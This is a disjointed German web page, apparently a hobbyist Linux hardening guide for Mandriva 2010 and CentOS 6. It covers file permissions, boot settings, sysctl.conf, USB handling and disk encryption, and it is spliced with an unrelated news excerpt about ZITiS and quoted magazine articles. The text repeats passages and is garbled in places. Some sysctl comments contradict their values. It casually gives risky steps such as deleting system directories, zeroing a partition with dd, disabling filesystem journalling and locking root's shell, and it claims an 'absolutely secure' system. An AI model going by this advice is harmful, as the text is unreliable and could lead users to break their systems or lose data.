Haushaltsentwurf der Behörde hervor, den wir veröffentlichen. Nach wie vor sucht ZITiS Staats-Hacker, aktuell ist nur die Hälfte der Stellen belegt. Die IT-Behörde ZITiS soll nächstes Jahr 36,7 Millionen Euro bekommen, 20 Prozent mehr als dieses Jahr. Die vor anderthalb Jahren gegründete "Zentrale Stelle für IT im Sicherheitsbereich" hilft Polizei und Geheimdiensten bei der technischen Überwachung. Wir veröffentlichen an dieser Stelle das bisher unveröffentlichte ZITiS-Kapitel aus dem Bundeshaushalt sowie eingestufte Informationen aus dem Bundesinnenministerium. Von diesem Geld wollen die staatlichen Hacker "hochmoderne technische Ausstattung" kaufen. Ganz oben auf der Wunschliste steht ein Hochleistungsrechner, "der vorrangig im Bereich der Kryptoanalyse genutzt wird" - also zur Entschlüsselung. Dieser Supercomputer hat "höchste Priorität" für die ZITiS-Abnehmer Verfassungsschutz, Bundeskriminalamt und Bundespolizei. https://netzpolitik.org/2018/36-millionen-euro-zitis-baut-supercomputer-zur-entschluesselung/ Zurück zum umfassenden Text: Abschließend wieder die Zugriffsrechte unter root setzen, bei uns: chmod 755 -R /usr/lib64/firefox* und den vollständigen iptables-Regelsatz von Linfw3 einfach wieder mit Klick auf Activate oder Debug aktivieren. Dadurch wird der STATE-NEW-Lineblock-only zugunsten Benutzers root damit von selbst aufgehoben. Firefox-Erweiterungs Disconnect und Noscript sollten wie Sprachdateien und Firefox-Plugins regelmäß auf Updates überprüft werden: Firefox -> Register Extras -> Addons -> "auf Updates überprüfen". Ein Wechsel in den Root-Modus ist hierfür aber zum Glück nicht erforderlich wie beim Updaten von Firefox insgesamt der Fall). Noch sicherer als übers Menü von Firefox erscheint uns aber das direkte Downloaden des aktuellen Firefox-Tarballs von Mozilla.org und sein entpacken in die altgewohnte Stelle. Als Owner des Verzeichnis Firefox und all seiner Dateien bietet sich root mittels chown -R root /home/user/firefox unter dem gewohnt virenfreien chmod 755 an. Mit dem (unserer Meinung nach auch wegen dem opensourced OpenSSL von openssl.org einzig) vergleichs- und rein möglicherweise sicheren Browser Konqueror, hier 4.4.5/4.4.9: Werbefilter je nach Konfiguration aktiviert oder inaktiviert, UA-Kennung: aktiviert, Cookies: aktiviert, JavaScript aktiviert oder je nach Bank auch inaktiviert, Plugins: aktiviert oder inaktiviert, Java: deaktiviert; Konqueror verhält sich erst bei der eher seltenen Überschreitung seiner Normen möglicherweise unsicher und und sogar instabil. Wie verlief das Booten? Bei mdv2010 sollte alles mit "OK" frei von Verzögerungen, Fehlermeldungen und Warnungen beim Booten gestartet und ausgeführt sein. Falls nicht, lohnt sich ein Blick ins Systemlog /var/log/messages, MCC -> System -> "Logdateien ansehen" oder
Bootvorgang (Rechner hochfahren): Zur Erkennung von Treiberfehlern, Fehlstarts von Diensten, sonstigen Defekten und Fehlkonfigurationen wird am besten immer im ausführlichen Textmodus und eben nicht im graphischen Modus - ganz ohne das mit eigener Login-Maske erscheinende Plymouth (rm -df /usr/bin/plymouth oder chmod 000 /usr/bin/plymouth) und desgleichen das System hochgefahren (gebootet) und auch der gelegentlich mit eigener Login-Maske auftauchende xscreensaver (el6) sollte auf chmod 000 gebracht werden. Damit kann man die Zeit beim Neustarten (Reset) und Herunterfahren des Systems erheblich verkürzen, es sei denn, der immer noch laufende plymouthd wurde in einem Runlevel-Init-Script aus /etc/init.d beim Hochfahren oder manuell beendet. Textmodus: MCC -> Systemstart -> graphischer Systemstart -gt; Textmodus. Sollten sich beim Booten (Hochfahren bzw. Starten des Computers) jemals Probleme ergeben, kann man bei mdv2010 (eigentlich bei allen UNIX/Linux) nach der Meldung des Dienstes udev einfach die Taste "i" für den interaktiven Modus drücken, um im Dialog abgesichert zu starten, das heißt, man kann ab hier manuell auswählen, welcher Prozess jeweils beim Booten gestartet werden soll und welcher nicht. Ergeben sich Probleme mit dem von mdv2010.0 auf mdv2010.2 geupgradeten X-Server (Graphikkartentreiber), deaktivere man durch Drücken der Taste n für no statt y für yes einfach den Displaymanager dm, um mit der Konsole weiter zu arbeiten (in unserem Fall den Graphikkartentreiber mittels rpm wieder den X-Server von mdv2010.0 zu installieren oder mit Terminal-Editoren wie xedit, vim, ed oder nano Text-Konfigurationsdateien zu bearbeiten). Mit mdv2010.2 können sich unserer Meinung nach nur Probleme mit dem X-Server ergeben. In diesem Fall installiere man wieder die Version von mdv2010.0. Generell: Sollte wider unserer Beschreibung ein Programm nicht laufen, verhelfen oft nicht nur Updates sondern auch Upgrades und Downgrades der Paket-Version. Mitunter sind bloß die Verlinkungen der Kerneldatei vmlinuz usw. in /boot nach Installation weiterer Kernel (wie RSBAC) durcheinander geraten, indem sie nun auf andere Versionen als die gemeinte nach /boot/grub/menu.lst verweisen. Zur Korrektur verhilft dann nur eine Rettungs-CD/DVD oder USB-Stift mit eigenem bootfähigem Linux oder ein Backup der Form einer Spiegelung auf andere Medien, neu zu verlinken: ln -sf TARGET Link-Dateiname Runterfahren sollte wie das Hochfahren unverzüglich, d.h. frei von Verzögerungen stattfinden, sind die richtigen Pakete von mdv2010 installiert. Kurze Anlaufstelle ist und bleibt das Terminal indizierende Mandriva-Logo mit dem orange-blaufarbenen Mandriva-Stern oben. FHS 2.1 ("all Linux"): /boot (am besten separate Boot-Partition mit initramfs von dracut), / Wurzelverzeichnis Root, /bin (ausführbare Dateien), /sbin (Shellskripte), /lib (kodierte Bibliotheken), /usr, /usr/bin, /usr/sbin, /usr/games/bin/, /usr/lib64, /usr/src (Sources, Quellcode), /usr/share/docs, /dev Gerätedateien, /opt ("Drittsoftware"), gute Mountpunkte: /media, /mnt, /mnt/beliebig, /proc (Prozessinformationen), /sys Systemspezifische Dateien, /var (sich dauernd ändernde Dateien), /var/log (Logfiles), /var/lib/drakbackup (Sicherungen, falls nicht extern), ..., Konfiguration von mdv (Linux): drakconf (MCC), systemsettings, gnome-control-center, Verzeichnisse und Dateien des Verzeichnisses /etc und Punktdateien und Punkt-Verzeichnisse im Benutzerverzeichnis Tilde ¨, darunter .kde/... und .kde4/share/config für die apps von KDE4 und /boot/grub/menu.lst Konfigurationsdatei des Bootloaders Grub und Grub2 über Befehl update-grub bzw. /etc/lilo.conf für Lilo, aktiviert mit Befehl lilo . Schließlich, nachdem alle empfohlenen Updates und Sicherhheitsupdates (el6, el7, vereinzelt rosa2014.1) einschließlich Downgrade auf den bis Ende 2015 durchgepatchten Konqueror 4.3.4 (el6) durchgeführt worden sind, alles, einschließlich die zahlreichen Games, supersicher und unschlagbar stabil läuft und mindestens eine 1:1-Spiegelung bzw. -Sicherung auf einem externen Medium vorliegt, kann man das den bei Abstürzen letzten Zustand wiederherstellende Journalling von reiserfs, ext3 und ext4 ausschalten bzw. abstellen. Das Dateisystem kann dann im Schadenfall durch Aktiivierung des Journallings oder mittels Rettungs-CD/DVD bzw. -Speicherstift trotzdem wieder repariert werden. Damit erspart sich der aufgrund Schreiboperationen die Lebendauer einer SSD angeblich einschränkende Overhead: Die Deaktivierung des Journallings gelingt mit der mount-Option nojou und nolog, die in /etc/fstab in der Zeile auf ReiserFS (reiserfs) arbeitende Partitionen lediglich zu den bereits gesetzten Optionen hinzuzufügen ist. Zwischen den mit Komma voneinander getrennten Optionen dürfen keine Leerzeichen stehen: "nojou und nolog schalten das Journalling von ReiserFS aus. Dies erhöht zwar die Performance für einige Anwendungen, führt aber zu einer Minderung der Fehlertoleranz. Im Fehlerfall ist die Disk zu unmounten oder Journalling für den nachfolgenden Boot wieder zu aktivieren", Quelle: http://www.botik.ru/doc/reiserfsprogs/html/fs.html . notail deaktiviert die Speicherung kleinerer Dateien in den Inodes (Informationsknoten, Indexeintrag) des Dateisystems. Ein Journaling Dateisystem ist in der Lage, die Effizienz und Sicherheit der Daten- und Speicherplatzverwaltung zu erhöhen, indem die Daten vor dem eigentlichen Abspeichern im Dateisystem in einem Journal zwischengespeichert und verwaltet werden. Für dieses Journal wird ein extra Speicherbereich reserviert. Das Journal gewährleistet auch die Datenkonsistenz, da auch bei Störungen während des Schreibvorganges ein konsistenter Zustand bereitgehalten wird bzw. rekonstruierbar ist. Dies ist bei Systemabstürzen und Systemausfällen von großem Vorteil, da neben der Rekonstruierbarkeit der Daten auch beim Wiederhochfahren die Routinen zur Überprüfung und Reparatur des Dateisystems entfallen. Beispiele für Journaling Dateisysteme sind: ReiserFS, NTFS, ext3/ext4 (Linux), JFS1/JFS2, HFJS (Hierarchical File Journaling System), BeFS (Be File System, BeOS) FFS (Berkeley Fast File System, BSD), SFS (SmartFilesystem) und PFS (Professional File System (Amiga)). Die Root-Partition kann unter Berücksichtigung erwähnter Artikel nun auch in /boot/grub/menu.lst (analog grub2) und /etc/fstab im Modus ro (Read-Only) eingebunden werden. Allerdings lässt sich dann auf ihr nichts mehr installieren, updaten und in /etc konfigurieren! Die insbesonders für Partitionen auf SSD infrage kommende Optionen lauten u.a.: nojou,nolog,notail,noatime,nodiratime,data=writeback,discard,iocharset=utf-8. Wir sind zur Verlängerung der SSD-Lebensdauer am Ziel: Programme laufen fehlerfrei. Die Root-Partition l&auuml;uft auf Wunsch read-only und das Journalling ist wie das Syslog abgeschaltet und ext3 wie ext4 mit tune2fs überprüft mit am besten jedem Bootvorgang in wenigen Sekunden die ext-Partition auf Fehlerfreiheit. Am Schluss "allen Updatens" bzw. nach dieser der Sektion, insbesonders nach Update des X-Servers setzen wir wieder "allow-root-login" genau wie "allow-remote-login" auf "no" und speichern mit msec -s den aktuellen Sicherheitslevel ab. Krönender Abschluss stellt das unter Eröterung von /etc/passwd bereits erwähnte Sperren des Logins für den Systemadministrator root und bis auf surfuser aller anderen user in /etc/passwd durch Setzen auf /sbin/nologin dar. Das Setzen auf diesen Wert sollte dort unmittelbar vorgenommen werden. Der Eintrag u.a. "root:x:0:0:root:/root:/bin/bash #" wird gesetzt auf "root:x:0:0:root:/root:/sbin/nologin". Schließlich setzen wir die Root-Partition wie beschrieben auf read-only (ro). Kommt es zu Installationen, wird sie wieder auf read-write (rw) zurückgesetzt. Wir fassen zusammen: Das absolut sichere OpenSource-Computersystem
Zur Wiederholung: Tagesschau, 31.07.2014: Bei USB-Sticks bedarf es zur Vermeidung des Auslesens sensibler Daten durch Ansteuerung des Microcontrollers (Prozessors) derzeit sicherlich noch der Einführung eines neuen Sicherheitsstandards, wie aus einem Bericht von der Linkseite unter Links vervorgeht. Bislang kann man auf diese Art alle Daten des fremden Rechners auslesen, auch Paßwörter und E-Mail-Inhalte oder andere Geräte wie die Webcam fernsteuern. Das Computer-Betriebssystem des fremden Rechners nimmt den Angriff nicht als Softwareattacke wahr, sondern glaubt, nur Tastenbefehle einer neuen Tastatur zu verarbeiten. All das kann nach der Befolgung unseres Exkurs nicht passieren. Das sichere Ein- und Ausbinden von USB-Medien über den USB-Anschluss wie USB-Speicherstifte funktioniert bei mdv2010 und el6 richtig gut und darf auf keinen Fall vergessen werden. Um die Verzögerung beim Ausbinden niedrig zu halten und generell störungsfreies Arbeiten mit USB-Medien zu emöglichen, empfiehlt sich das Installieren der neuesten Version des Dateisystems (reiserfsprogs-3.6.24, als sicherer erwies sich für mdv2010 reiserfsprogs von mdv2011.0 oder el6, e2fsprogs (1.43.2) und die permanente Integration des Moduls "usb_storage". Die Integration über "modprobe usb_storage" garantiert dessen Intergration aber nur bis zum Neustart. Stattdessen ist in die Datei /etc/modprobe.preload folgender Eintrag aufzunehmen:
Nun erfolgt das sichere Ein- und Ausbinden unseren Erfahrungen nach mehr als zuverlässig. Zur Verhinderung empfiehlt sich die von uns angesprochene vollständige Verschlüsselung der Datenträger wie Speicherstift und Festplatte, zumindest einzelner Dateien. Wir sehen bei all der roten Markierung: dass, obwohl wir von Sicherheit sprechen und sich auch Letzteres auf dem von uns vorgestellten System wohl kaum wirklich auswirkt und unserer Meinung nach alles zurückzuerstatten ist, man beim Computer nie auslernt. Um näher von Sicherheit zu sprechen, erscheint die konzeptionell möglichst weit reichende Intransparenz von Sicherheitstechnik auf Seite der Bedroher zur Transparenz auf Seite der sich Schützenden als Sicherheit des einen auf Kosten der Unsicherheit des anderen als ganz besonders sinnvoll. Geht es zentral um Sicherheit, herrscht somit vor allem Konzentration auf ein Anliegen: fremden, unerwünschten Zugang nach innen, Hacken, abzuwehren und zugleich den Kontakt nach außen aufnehmender getarnter Instanzen (Prozesse) die Funktion als Informationslieferant, Räuber bzw. als Backdoor (oder auch Trojaner genannt) zu untersagen. Grundsätzlich fallen hier neben einer Reduzierung der Anzahl aktivierter Benutzer, Benutzergruppen und Serverdienste in der Systemkonfiguration des Betriebsystems fünf Konzepte ein: unablässige Sperrung des Remote-ROOT-Logins und Rootlogins bzw. Heraufsetzung des Betriebssystemzwecks durch msec (oder msec umfassende Utilities wie draksec) auf die Stufe "Sicher- secure - Serverbetrieb" unmittelbar vor dem Sicherheits-Niveau "paranoid", Verschlüsselung der Festplatte samt Auslagerungsdatei (bitte hier klicken), von Onlineverbindungen, des E-Mail-Transfers und der E-mail selbst, Zugriffskontrolle auf Benutzer und Benutzergruppen mit dem Benutzer Root (Systemadministrator) für alle Rechte, Einschränkung der Dateifreigabe innerhalb eines lokalen Netzes (LAN) und Firewall. Mittels Zugriffskontrolle über chmod ugo +rwxr-xr-x (u für user mit Lesen, Schreiben, Ausführen, Gruppe (g, group) und Welt (o, other) mit Lesen und Ausführen) gleichkommendes chmod 755 Verzeichnis_oder_Dateiname abwärts auf Besitzer Root kann dank nur weniger unter Rootrechten laufenden Systemprozessen, gegenenfalls noch in Verbindung mit chattr +i bzw. chattr +ius zur Wahrung der Integrität von Dateien neben Schreib- und Leseschutz im LAN, abgesehen vom userspace (Home-Verzeichnis home/user bzw. ~ für home) die vom Scannen befreiende Virenfreiheit auf dem lokalen Rechner erzielt werden. Virenscanner von UNIX/Linux dienen somit nur noch dazu, E-Mail kurz auf gewisse andere Betriebssysteme gefährdende Viren hin zu überprüfen, gelegentlich das Home-Verzeichnis. Nach Einbezug anderer Punkte wie bereits erwähntem Root-Login und Serverbetrieb garantiert chmod 700 die Unlesbarkeit von Dateien und Verzeichnissen von außen, innerhalb des WAN bereits kleiner gleich 750. Außerdem verhindet Zugriffskontrolle die Installation von Schadsoftware über das Öffnen von Anhängen in E-mail. Viel mehr bewirkt die Zugriffskontrolle im Internet (als Teil des WAN) allerdings i.a. nicht, da sich auch ein "fremder" Benutzer gleichen Namens Root als ein und derselbe "lokale" Systemadministrator ausgeben kann, alle erforderlichen Zugriffsrechte auf einmal zu besitzen, es sei denn, ein Remotelogin ist über die Systemkonfiguration bzw. Sicherheitsprogramme wie draksec von Mandriva ausdrücklich untersagt worden, dringend zu empfehlen! Im Zusammenspiel mit Linfw3, für Sicherheit und Unsichtbarkeit nach außen lauten die empfohlenen Zugriffsrechte für Verzeichnisse und Dateien meist auf Eigentümer root und Gruppe root::
Rest chmod 755 ggfls. niedriger, Dateien für die einzelnen E-Mail-Konten (unter UID- und GID-Owner "abtauchend") vorsichtshalber auf chmod 700 eines anderen Benutzers als surfuser und einer anderen Gruppe als ihm zugehöriger Gruppe surfgruppe. Zugriffsrechte der Benutzerverzeichnisse unter home können mit der iptables-Firewall im Zusammenhang stehen wie bei der von uns noch vorgestellten Firewall LINFW3 der Fall, vorweg: chmod 750 (oder tiefer wie chmod 700), alternativ (und am besten grundsäztlich und von Anfang an selbstätig) alles über umask, mit jedem Neustart und somit fest voreingestellt Zugriffsrechte in MCC unter Sektion "Sicherheit". Schutz vor dem Download von Malware aus dem Internet bieten Prüfsummenabgleiche mit checksum. SELinux von der NSA/USA (wer kennt sie nicht?) und Tomoyo aus Japan verschärfen das Konzept der Zugriffskontrolle über Prozess und Elternprozesse zusammenfassende Domainen durch über sie wachende ACL-Listen, welcher Prozess bzw. ausführbare Datei nach spezieller Regelung durch den Benutzer überhaupt durch welche Benutzer und/oder Prozesse bzw. ausführbare Dateien aufgerufen werden darf. mdv2010.0 und 2010.1 bieten zwar SE Linux und Tomoyo an, legen aber durch das MCC insbesonders Tomoyo nahe. Tomoyo befindet sich dort in der Sektion für Sicherheit, läuft aber auch in eigenen Terminal-Editoren. Zunächst durchläuft Tomoyo eingerichtete Test-ACL nur im Testbetrieb, alle Zugriffe lediglich zu sammeln und zu registrieren. Einzelheiten zu Tomoyo kann man von unserer Linkseite unter Computer, Sektion Alternativen unter Tomoyo, entnehmen. Trotzdem: Diese Erweiterung durch ACL-Listen kann bei gewissem Umfang verwirren und für nur schlecht erklärliche Blockaden sorgen. Sie ist unserer Meinung nach wegen herkömmlichen Maßnahmen nicht unbedingt erforderlich. Freigaben: Windows & Linux im Netzwerk verbinden, PC-WELT.de, 08.11.2015 Im Dateimanager von Linux finden Sie im Kontextmenü eines Ordners die "Freigabeoptionen". Im Netzwerk vertragen sich Linux und Windows gut. Mit der richtigen Software und Konfiguration stellt der Datenaustausch über Netzwerkfreigaben in beide Richtungen kein Problem dar. SMB/CIFS ist das Standardprotokoll für Netzwerkfreigaben unter Windows. Es lässt sich jedoch auch unter Linux, Android und Mac OS X verwenden. SMB steht für "Server Message Block"-Protokoll. Dieses Netzwerkprotokoll stammt ursprünglich von IBM und die Weiterentwicklung unter dem Namen CIFS (Common Internet File System) von Microsoft. Es kommt zum Einsatz, wenn Sie unter Windows im Netzwerk Speicherplatz beziehungsweise Dateien für andere Nutzer bereitstellen oder auf diese zugreifen möchten. Auf einem Linux-System stellt das Programmpaket Samba Funktionen für Netzwerkfreigaben bereit. Samba besteht aus einem Client und einem Server. Der Client ist bei den meisten Linux-Distributionen standardmäßig installiert und erlaubt den Zugriff auf die Netzwerkfreigaben anderer Rechner. Den Serverteil müssen Sie bei einigen Distributionen nachinstallieren. Dann lassen sich unter Linux Freigaben einrichten, auf die auch Windows-Nutzer über das Netzwerk zugreifen können, Einzelheiten: http://www.pcwelt.de/ratgeber/Windows-und-Linux-Freigaben-einrichten-9790088.html - Benötigt wird von mdv2010 (el6) eine Root-Partition mit mindestens 60 Gigabyte Für mehr freien Speicherplatz auf der root-Partition (zur weiteren Unterstützung umsagter Mausklick-Schnelle) kann man bei drohender Auslastung wie folgt sorgen: - Löschen bzw. Entfernen nicht mehr benötigter Programme und Pakete - Verschieben und Linken des doc- und/oder man-Verzeichnisses aus /usr/share mit den Benutzerhandbüchern auf die Home-Partition: cp -axf /usr/share/doc /home/user/ und rm -dfr /usr/share/doc; Gewinn: um die zwei Gigabyte - Verschieben und Linken des Webserver-Verzeichnisses www aus /var auf die Home-Partition - Verlinkung und Linken aller Logdateien aus /var/log und temporärer Verzeichnisse mit /tmp: /var/tmp, /usr/tmp, /root/tmp, home/user/tmp, - Verlinkung der Browser-Caches aus /home/user/.kde4 für Konqueror mit /tmp: rm -df /home/surfuser/.kde4/cache-localhost.localdomain und ln -sf /tmp /home/surfuser/.kde4/cache-localhost.localdomain - Entrüpelung der Partition mit klean, bleachbit (dieses Programm ist mit Vorsicht zu genießen!), sweeper etc. Derart intelligente UNIX-Dateisysteme wie das Journallingkonzept unterstützende, sich i.d.R. dank Journallingeigenschaft in Sekundenschnelle beim Booten selbst reparierende ReiserFS machen obendrein noch das Defragmentieren von Partitionen überflüssig, da sie von vornherein keine (unzusammenhängende) Fragmente entstehen lassen (Quelle: SuSE Linux 7.3 Handbuch Reference Manual). Zu beachten ist hier lediglich, dass Partitionen zu nicht mehr als 90% mit Daten belegt werden. PC-WELT.de, 20.12.2015: Eine SSD unterscheidet sich in vielerlei Hinsicht von herkömmlichen Festplatten. Sie ist aber nicht einfach nur schnell und leise. SSDs wollen auch anders behandelt werden als normale HDDs. Sie müssen die Flash-Speicher beispielsweise nicht defragmentieren - es gibt schließlich keinen Schreib- und Lesekopf wie bei herkömmlichen Platten, der nahe nebeneinander liegende Daten bevorzugt. Streichen Sie Defragmentierer also von der Liste der wichtigen Programme, wenn Sie eine SSD für Windows nutzen. Das weiß auch das Gratis-Tool SSD Tweaker und verhindert unter anderem die automatische Defragmentierung unter Windows. Das kleine Programm achtet aber auch darauf, dass die SSD nicht zu 100% vollgeschrieben wird und damit die Performance einbricht. http://www.tecchannel.de/sicherheit/management/3281630/verschluesselung_ist_nicht_gleich_verschluesselung/: Es gibt viele Arten der Verschlüsselung, sie zu unterscheiden ist für den normalen Verbraucher meist unmöglich. Einige werden ohne Wissen automatisch genutzt. HTTPS-Verbindungen über das Transport Layer Security Protokoll (TLS, früher SSL) beispielsweise werden beim Homebanking oder Online-Shopping verwendet. Hierbei ist der Transportweg der Daten zum Server im Internet verschlüsselt. Dies ist glücklicherweise heute zum Quasi-Standard geworden, zumindest bei wichtigen Daten. Viele Internetnutzer sind hierzu sensibilisiert. Doch was nützt die verschlüsselte Übertragung der Daten, wenn Hacker diese am Server durch eine Sicherheitslücke wieder abgreifen? Ein anderes Beispiel: Auch heute noch kann nicht sichergestellt werden, dass eine E-Mail über ausschließlich verschlüsselte Transportwege seinen Empfänger erreicht. Seit die großen Internetprovider in Deutschland TLS zwangsweise als sichere Verbindung zwischen Mailclients (Desktop, mobil) und Mailservern durchgesetzt haben, ist der E-Mail-Verkehr in Deutschland zwar erheblich sicherer geworden, aber dies gilt nicht überall. Für den Fall E-Mail existieren mindestens zwei gängige Lösungen und dies schon ziemlich lange: S/MIME und PGP beziehungsweise OpenPGP. Hier spricht man von Ende-zu-Ende-Verschlüsselung. Der Sender eine E-Mail verschlüsselt diese und nur der Empfänger kann sie entschlüsseln. Dies gilt zwar nur für den Nachrichteninhalt, nicht die Metadaten (wie den Betreff, Mailadressen oder Zeitstempel), aber zumindest dieser wird so auch über unverschlüsselte Transportwege sicher geschützt. Für den Fall E-Mail existieren mindestens zwei gängige Lösungen und dies schon ziemlich lange: S/MIME und PGP beziehungsweise OpenPGP. Hier spricht man von Ende-zu-Ende-Verschlüsselung. Der Sender eine E-Mail verschlüsselt diese und nur der Empfänger kann sie entschlüsseln. Dies gilt zwar nur für den Nachrichteninhalt, nicht die Metadaten (wie den Betreff, Mailadressen oder Zeitstempel), aber zumindest dieser wird so auch über unverschlüsselte Transportwege sicher geschützt. Eine digitale Signatur schützt die E-Mail zusätzlich vor Veränderung auf einem gegebenenfalls ungeschützten Transportweg. Sind Sie bereits ein "Kmailer", oder möchten Sie einer werden? Dann lesen Sie bitte in unserem Abschnitt "Kmail (und andere Email-Client-Programme) weiter! Konfiguration der Datei /etc/sysctl.conf (initscripts mdv2010, el6) # Kernel sysctl configuration file for CentOS 6, Mandriva Linux, Mageia, Rosa, Fedora Core # # For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and # sysctl.conf(5) for more details. net.ipv6.conf.lo.use_tempaddr = 0 # Disables IP dynaddr net.ipv4.ip_dynaddr = 1 # Disable ECN net.ipv4.tcp_ecn = 1 # Controls source route verification net.ipv4.conf.default.rp_filter = 1 # Do not accept source routing net.ipv4.conf.default.accept_source_route = 0 # Controls the System Request debugging functionality of the kernel #kernel.sysrq = 0 # Controls whether core dumps will append the PID to the core filename. # Useful for debugging multi-threaded applications. kernel.core_uses_pid = 1 # If you set this variable to 1 then cd tray will close automatically when the # cd drive is being accessed. # Setting this to 1 is not advised when supermount is enabled # (as it has been known to cause problems) dev.cdrom.autoclose=1 # removed to fix some digital extraction problems # dev.cdrom.check_media=1 # to be able to eject via the device eject button (magicdev) dev.cdrom.lock=0 # Disable netfilter on bridges net.bridge.bridge-nf-call-ip6tables = 0 net.bridge.bridge-nf-call-iptables = 0 net.bridge.bridge-nf-call-arptables = 0 net.ipv4.conf.all.rp_filter=1 net.ipv4.tcp_window_scaling=1 net.ipv4.tcp_timestamps=1 net.ipv4.conf.all.log_martians=1 net.ipv4.icmp_echo_ignore_all=1 net.ipv4.icmp_echo_ignore_broadcasts=1 net.ipv4.icmp_ignore_bogus_error_responses=1 # Controls the use of TCP syncookies net.ipv4.tcp_syncookies = 1 # Controls the default maxmimum size of a mesage queue kernel.msgmnb = 65536 # Controls the maximum size of a message, in bytes kernel.msgmax = 65536 # Controls the maximum shared segment size, in bytes # kernel.shmmax = 68719476736 kernel.shmmax = 134217728 # siehe ktune # Controls the maximum number of shared memory segments, in pages kernel.shmall = 4294967296 Die kernel.shm-Parameter (und weitere Parameter) kann man im Zweifelsfall natürlich weglassen. Vorweg: In TrueCrypt für Windows verstecken sich zwei schwere Sicherheitslücken. Nutzer sollten daher zu Gratis-Alternativen greifen!, Quelle: PC-WELT.de, 30.09.2015 Bei Dateisystemen ohne derart mächtige Konzepte eignen sich kleinere Umgebungen, insbesonders um den Browser herum abschottende Sandboxen. Die Verschlüsselung von Partitionen samt der Datei zur Auslagerung von Teilen des Arbeitsspeichers RAM auf SWAP bzw. die SWAP-Partition kann sowohl auf extrem einfacher Art über den Partitionsmanager der Systemkonfiguration unter Optionen als auch sogenannte Loopdevices für virtuelle Partitionen auf herkömmlichen Dateien erfolgen, neuere Linuxversionen lassen von Installations-DVD/CD nur noch ein wenig aufwendigere Methoden wie LUKS/dmcrypt aus dem Paket cryptsetup und das verschlüsselbare Dateisystem für userspace namens encfs zu, Einzelheiten siehe unter Links. Wir empfehlen LUKS. Dennoch sollten während des Einspielens sensibler Daten keine seitens Benutzer online aufgebauten, Verbindung haltende Prozesse wie insbesonders Browser aktiv sein. Zu beachten ist noch die in mehreren Studien erwähnte (angebliche) Unzulänglichkeit einer Verschlüsselung mit an für sich nicht besonders unsicher einzustufenden Methoden wie XOR. Alle Partitionen, zumindest das Benutzerverzeichnis wie home bzw. ~, alle temporären Verzeichnisse und auch die Swap-Partition mit der Auslagerungsdatei SWAP gehören verschlüsselt. Dafür eignen sich Kodierungen wie AES, SERPENT, Two- oder Blowfish. Über einen Partitionsmanager von UNIX/Linux aus der Systemsteuerung bzw. mehr oder weniger spezielle Befehlen zur Einrichtung sogenannter Loopdevices kann bei Bedarf durch selbsttätiges Nachladen des Kernel-Kryptographiemoduls der verschlüsselnde passwortschutz einsetzen. Die Bewerkstelligung erfolgt bei LOOP-AES unter Vornahme von Optionen des Partitionsmanagers aus MCC oder Yast2 der Sektion lokale Festplatten wie "Verschlüsseln" einer Partition und ist daher an für sich einfach anzuwenden, hingegen ermöglichen erst neuere UNIX-/Linux-Distributionen die Verschlüsselung gleich von Anfang an zum Zeitpunkt der Installation. Die Partition für die Auslagerungsdatei kann unter UNIX/Linux mit LOOP-AES (mdv2007.0) wie folgt verschlüsselt werden: Deaktivieren des Zugriffs auf die Auslagerungsdatei: swapoff -a Gerätekonfigurationsdatei fstab aus /etc: Gerätedatei swap swap sw,loop0,encryption=AES128 0 0 mit Gerauml;tedatei unter /dev wie rein bspws. /dev/sda6 Überschreiben der alten Swap-Partition: dd if=/dev/zero of=/dev/sda6 bs=64k conv=notrunc Erzeugen der SWAP-Partition: mkswap /dev/sda6 (sda6 sei hier natürlich nur rein exemplarisch die SWAP-Partition) Aktivieren: swapon -a Verschlüsselungen der Speichermedien: 1 Dateisystem-Verschlüsselung 1.1 eCryptfs - eCryptfs speichert kryptographische Metadaten in den Header einer jeden geschriebenen Datei, so dass verschlüsselte Dateien zwischen den Hosts kopiert werden können. Ein geeigneter Key im Linux kernel keyring sorgt für die Entschlüsselung. Diese Lösung ist als Basis des verschlüsselten Home-Verzeichnis weit verbreitet und findet sich transparent in mehreren Netzwerken eingebundenen Speichermedien (NAS) 1.2 EncFS -stellt ein verschlüsseltes Dateisystem für den Userspace bereit, ohne spezielle Rechte zu benötigen. EncFS arbeitet auf Basis der FUSE-Library und FUSE-Linux-Kernel- Moduls. EncFS ist unter der GPL lizensierte Opensource-Software, welche sie von fr2.rpmfind.net beziehen können. 2 Festplattenverschlüsselung 2.1 Loop-AES - schnelle und transparente Verschlüsselung des Dateisystems und der SWAP Partition, die keine Veränderung des Quellcodes des Linux-Kernels erfordert. Sie arbeitet mit 3.x, 2.6, 2.4, 2.2- und 2.0-Kerneln. 2.2 Truecrypt - Opensource Festplattenverschlüsselung für Windows 7/Vista/XP, Mac OS X und Linux 2.3 dm-crypt/LUKS - dm-crypt ist ein transparentes Subsystem zur Festplattenverschlüsselung des Linux-Kernels v2.6+ und höher und des DragonFly BSD. Luks eignet sich zur Verschlüsselung der Festplatte, Removable Speichermedien, softwarebasierter RAID Volumes, Logical Volumes und einzelner Dateien Datenschutz unter Linux (Ubuntu) durch Verschlüsselung : Cloud-Speicher mit encfs absichern, truecrypt (diese Methode wird nicht mehr empfohlen), Homeverzeichnis (nachträglich) verschlüsseln: http://www.pcwelt.de/ratgeber/Datenschutz_unter_Linux_durch_Verschluesselung-Linux-Sicherheit-8205997.html. Wir beziehen uns hier aber nicht auf diesen Bericht, sondern verschlüsseln die Root- wie Home-Partition samt Temporärer Verzeichnisse ausschließlich mit LUKS. Für die einfach mittels Option "encrypt" des Partitionsmanager der Systemkonfiguration MCC erfolgende, aber die Rootpartition noch nicht verschlüsselnde Methode Loop-AES benötigt man jedenfalls die Pakete aescrypt, cryptcat, losetup, libmcrypt und/oder util-linux oder loop-AES. Davon mag ein Großteil bereits von Linux- bzw. mdv-Installations-CD/DVD installiert worden sein. In von dieser Methode mit Loop-AES zugunsten LUKS/dm-crypt des Pakets cryptsetup eher abrückenden Folgeversionen nach mdv2008.1 erachten Anbieter wie mdv das Verschlüsseln der Auslagerung des Arbeitsspeichers nur für den Fall des Diebstahls eines Laptops noch für erwähnenswert, während, siehe Linkseite, von anderer Stelle die Betonung gerade darauf liegt. Auf unserer Linkseite werden die hierfür erforderlichen Einzelschritte neben weiteren Möglichkeiten mit LUKS/dm-crypt beschrieben. Eine vollständige Verschlüsselung der Festplatte bzw. SSD (FDE full disk encryption), geschweige einschließlich des Bootverzeichnisses "boot" aus Bootmanager, Kernel und Ramdisc (initrd), gelingt mit Loop-AES aber zur Zeit immer noch nicht, genauer gesagt die Verschlüsselung der Hauptpartition mit Einbindeverzeichnis (Mountpoint) "/" 